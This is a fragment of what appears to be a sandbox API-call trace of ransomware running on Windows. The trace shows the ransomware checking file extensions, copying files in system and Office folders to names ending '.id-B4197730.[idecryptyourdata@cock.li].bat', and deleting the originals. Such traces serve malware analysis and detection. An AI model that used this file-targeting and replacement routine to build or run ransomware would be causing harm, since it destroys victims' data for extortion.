[0178.588] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.588] lstrlenW (lpString=".rar") returned 4 [0178.588] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.588] lstrlenW (lpString=".bz2") returned 4 [0178.588] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.588] lstrlenW (lpString=".7z") returned 3 [0178.588] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.588] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0178.588] lstrlenW (lpString=".dbf") returned 4 [0178.588] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.588] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0178.588] lstrlenW (lpString=".1cd") returned 4 [0178.588] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.588] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0178.588] lstrlenW (lpString=".jpg") returned 4 [0178.588] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.588] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0178.588] lstrlenW (lpString="bootvhd.dll") returned 11 [0178.589] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0178.589] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=99744) returned 1 [0178.589] CloseHandle (hObject=0x348) returned 1 [0178.589] GetFileAttributesW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll")) returned 0x20 [0178.589] GetFileAttributesW (lpFileName="C:\\Boot\\bootvhd.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\bootvhd.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.589] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.589] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0178.589] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0178.589] lstrlenW (lpString=".doc") returned 4 [0178.589] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.589] lstrlenW (lpString=".docx") returned 5 [0178.589] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0178.589] lstrlenW (lpString=".pdf") returned 4 [0178.589] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.589] lstrlenW (lpString=".xls") returned 4 [0178.589] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.589] lstrlenW (lpString=".xlsx") returned 5 [0178.590] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0178.590] lstrlenW (lpString=".ppt") returned 4 [0178.590] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.590] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0178.590] lstrlenW (lpString=".zip") returned 4 [0178.590] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.590] lstrlenW (lpString=".rar") returned 4 [0178.590] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.590] lstrlenW (lpString=".bz2") returned 4 [0178.590] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.590] lstrlenW (lpString=".7z") returned 3 [0178.590] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.590] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0178.590] lstrlenW (lpString=".dbf") returned 4 [0178.590] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.590] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0178.590] lstrlenW (lpString=".1cd") returned 4 [0178.590] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.590] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0178.590] lstrlenW (lpString=".jpg") returned 4 [0178.590] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.590] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0178.590] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0178.590] lstrlenW (lpString=".doc") returned 4 [0178.590] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.590] lstrlenW (lpString=".docx") returned 5 [0178.591] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0178.591] lstrlenW (lpString=".pdf") returned 4 [0178.591] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.591] lstrlenW (lpString=".xls") returned 4 [0178.591] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.591] lstrlenW (lpString=".xlsx") returned 5 [0178.591] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0178.591] lstrlenW (lpString=".ppt") returned 4 [0178.591] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.591] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0178.591] lstrlenW (lpString=".zip") returned 4 [0178.591] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.591] lstrlenW (lpString=".rar") returned 4 [0178.591] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.591] lstrlenW (lpString=".bz2") returned 4 [0178.591] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.591] lstrlenW (lpString=".7z") returned 3 [0178.591] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.591] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0178.591] lstrlenW (lpString=".dbf") returned 4 [0178.591] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.591] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0178.591] lstrlenW (lpString=".1cd") returned 4 [0178.591] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.591] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0178.591] lstrlenW (lpString=".jpg") returned 4 [0178.591] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.591] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0178.591] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0178.591] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0178.592] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=76632) returned 1 [0178.592] CloseHandle (hObject=0x348) returned 1 [0178.592] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0178.592] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.592] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.592] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0178.592] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0178.592] lstrlenW (lpString=".doc") returned 4 [0178.592] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0178.592] lstrlenW (lpString=".docx") returned 5 [0178.592] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0178.593] lstrlenW (lpString=".pdf") returned 4 [0178.593] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0178.593] lstrlenW (lpString=".xls") returned 4 [0178.593] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0178.593] lstrlenW (lpString=".xlsx") returned 5 [0178.593] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0178.593] lstrlenW (lpString=".ppt") returned 4 [0178.593] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0178.593] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0178.593] lstrlenW (lpString=".zip") returned 4 [0178.593] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0178.593] lstrlenW (lpString=".rar") returned 4 [0178.593] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0178.593] lstrlenW (lpString=".bz2") returned 4 [0178.593] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0178.593] lstrlenW (lpString=".7z") returned 3 [0178.593] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0178.596] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0178.598] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0178.600] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0178.601] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0178.899] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0178.900] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0178.900] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0178.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0178.901] GetLastError () returned 0x0 [0178.901] ReadFile (in: hFile=0x33c, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x52c0, lpOverlapped=0x0) returned 1 [0178.945] WriteFile (in: hFile=0x340, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x52d0, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x52d0, lpOverlapped=0x0) returned 1 [0178.946] ReadFile (in: hFile=0x33c, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0178.946] WriteFile (in: hFile=0x340, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x110, lpOverlapped=0x0) returned 1 [0178.946] SetEndOfFile (hFile=0x340) returned 1 [0178.947] CloseHandle (hObject=0x340) returned 1 [0178.947] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0178.947] SetEndOfFile (hFile=0x33c) returned 1 [0178.948] CloseHandle (hObject=0x33c) returned 1 [0178.948] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0178.948] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll")) returned 1 [0178.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 88 [0178.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 88 [0178.949] lstrlenW (lpString=".doc") returned 4 [0178.949] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.949] lstrlenW (lpString=".docx") returned 5 [0178.949] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0178.949] lstrlenW (lpString=".pdf") returned 4 [0178.949] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.949] lstrlenW (lpString=".xls") returned 4 [0178.949] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.949] lstrlenW (lpString=".xlsx") returned 5 [0178.949] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0178.949] lstrlenW (lpString=".ppt") returned 4 [0178.949] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 88 [0178.949] lstrlenW (lpString=".zip") returned 4 [0178.949] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.949] lstrlenW (lpString=".rar") returned 4 [0178.949] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.949] lstrlenW (lpString=".bz2") returned 4 [0178.949] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.949] lstrlenW (lpString=".7z") returned 3 [0178.949] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 88 [0178.950] lstrlenW (lpString=".dbf") returned 4 [0178.950] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 88 [0178.950] lstrlenW (lpString=".1cd") returned 4 [0178.950] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 88 [0178.950] lstrlenW (lpString=".jpg") returned 4 [0178.950] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 88 [0178.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 88 [0178.950] lstrlenW (lpString=".doc") returned 4 [0178.950] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.950] lstrlenW (lpString=".docx") returned 5 [0178.950] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0178.950] lstrlenW (lpString=".pdf") returned 4 [0178.950] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.950] lstrlenW (lpString=".xls") returned 4 [0178.950] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.950] lstrlenW (lpString=".xlsx") returned 5 [0178.950] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0178.950] lstrlenW (lpString=".ppt") returned 4 [0178.950] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 88 [0178.950] lstrlenW (lpString=".zip") returned 4 [0178.950] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.950] lstrlenW (lpString=".rar") returned 4 [0178.950] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.951] lstrlenW (lpString=".bz2") returned 4 [0178.951] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.951] lstrlenW (lpString=".7z") returned 3 [0178.951] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.951] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 88 [0178.951] lstrlenW (lpString=".dbf") returned 4 [0178.951] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.951] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 88 [0178.951] lstrlenW (lpString=".1cd") returned 4 [0178.951] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.951] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 88 [0178.951] lstrlenW (lpString=".jpg") returned 4 [0178.951] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.951] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0178.951] lstrlenW (lpString="api-ms-win-crt-utility-l1-1-0.dll") returned 33 [0178.951] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0178.952] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=19136) returned 1 [0178.952] CloseHandle (hObject=0x33c) returned 1 [0178.952] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll")) returned 0x20 [0178.952] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.952] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0178.952] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0178.952] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0178.952] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0178.954] GetLastError () returned 0x0 [0178.954] ReadFile (in: hFile=0x33c, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x4ac0, lpOverlapped=0x0) returned 1 [0178.958] WriteFile (in: hFile=0x340, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x4ad0, lpOverlapped=0x0) returned 1 [0178.959] ReadFile (in: hFile=0x33c, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0178.960] WriteFile (in: hFile=0x340, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x116, lpOverlapped=0x0) returned 1 [0178.960] SetEndOfFile (hFile=0x340) returned 1 [0178.960] CloseHandle (hObject=0x340) returned 1 [0178.960] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0178.960] SetEndOfFile (hFile=0x33c) returned 1 [0178.961] CloseHandle (hObject=0x33c) returned 1 [0178.961] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0178.961] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll")) returned 1 [0178.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 91 [0178.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 91 [0178.962] lstrlenW (lpString=".doc") returned 4 [0178.962] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.962] lstrlenW (lpString=".docx") returned 5 [0178.962] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0178.962] lstrlenW (lpString=".pdf") returned 4 [0178.962] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.962] lstrlenW (lpString=".xls") returned 4 [0178.962] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.962] lstrlenW (lpString=".xlsx") returned 5 [0178.962] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0178.962] lstrlenW (lpString=".ppt") returned 4 [0178.962] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 91 [0178.962] lstrlenW (lpString=".zip") returned 4 [0178.962] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.962] lstrlenW (lpString=".rar") returned 4 [0178.962] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.962] lstrlenW (lpString=".bz2") returned 4 [0178.962] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.962] lstrlenW (lpString=".7z") returned 3 [0178.962] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 91 [0178.963] lstrlenW (lpString=".dbf") returned 4 [0178.963] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 91 [0178.963] lstrlenW (lpString=".1cd") returned 4 [0178.963] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 91 [0178.963] lstrlenW (lpString=".jpg") returned 4 [0178.963] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 91 [0178.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 91 [0178.963] lstrlenW (lpString=".doc") returned 4 [0178.963] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.963] lstrlenW (lpString=".docx") returned 5 [0178.963] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0178.963] lstrlenW (lpString=".pdf") returned 4 [0178.963] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.963] lstrlenW (lpString=".xls") returned 4 [0178.963] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.963] lstrlenW (lpString=".xlsx") returned 5 [0178.963] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0178.963] lstrlenW (lpString=".ppt") returned 4 [0178.963] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 91 [0178.963] lstrlenW (lpString=".zip") returned 4 [0178.963] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.963] lstrlenW (lpString=".rar") returned 4 [0178.964] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.964] lstrlenW (lpString=".bz2") returned 4 [0178.964] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.964] lstrlenW (lpString=".7z") returned 3 [0178.964] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 91 [0178.964] lstrlenW (lpString=".dbf") returned 4 [0178.964] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 91 [0178.964] lstrlenW (lpString=".1cd") returned 4 [0178.964] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 91 